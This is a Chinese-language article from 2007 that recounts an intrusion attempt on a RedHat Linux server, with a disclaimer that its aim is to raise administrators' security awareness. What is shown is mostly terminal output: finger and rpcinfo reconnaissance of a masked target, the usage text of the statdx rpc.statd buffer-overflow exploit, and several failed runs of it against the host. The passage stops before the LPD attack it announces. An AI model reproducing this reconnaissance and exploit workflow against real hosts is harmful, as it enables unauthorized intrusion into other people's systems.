加强安全意识:再现一次曲折的RedHat Linux系统入侵
作者: GoGo , 出处:H.L.C, 责任编辑: 徐蕊,
2007-12-18 10:20
此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕LPD:网络打印服务的攻击而进行的。
| 以下是引用片段: bash-2.04$finger @www.XXX.com [www.XXX.com] No one logged on. |
| 以下是引用片段: bash-2.04$rpcinfo -p www.XXX.com program vers proto port service 100000 2 tcp 111 rpcbind 100000 2 udp 111 rpcbind 100021 1 udp 1024 nlockmgr 100021 3 udp 1024 nlockmgr 100024 1 udp 1025 status 100024 1 tcp 1024 status |
| 以下是引用片段: bash-2.04$./statdx -h statdx by ron1n Usage: stat [-t] [-p port] [-a addr] [-l len] [-o offset] [-w num] [-s secs] [-d type] -t attack a tcp dispatcher [udp] -p rpc.statd serves requests on [query] -a the stack address of the buffer is -l the length of the buffer is [1024] -o the offset to return to is [600] -w the number of dwords to wipe is [9] -s set timeout in seconds to [5] -d use a hardcoded Available types: 0 Redhat 6.2 (nfs-utils-0.1.6-2) 1 Redhat 6.1 (knfsd-1.4.7-7) 2 Redhat 6.0 (knfsd-1.2.2-4) 看来并不支持RH7。还是继续尝试,把0-2全部试试看再说!start…… bash-2.04$stat -d 0 www.XXX.com buffer: 0xbffff314 length: 999 (+str/+nul) target: 0xbffff718 new: 0xbffff56c (offset: 600) wiping 9 dwords Failed - statd returned res_stat: (failure) state: 21 受挫,再试…… bash-2.04$stat -d 1 www.XXX.com buffer: 0xbffff314 length: 999 (+str/+nul) target: 0xbffff718 new: 0xbffff56c (offset: 600) wiping 9 dwords Failed - statd returned res_stat: (failure) state: 21 |
- 本文关键词:
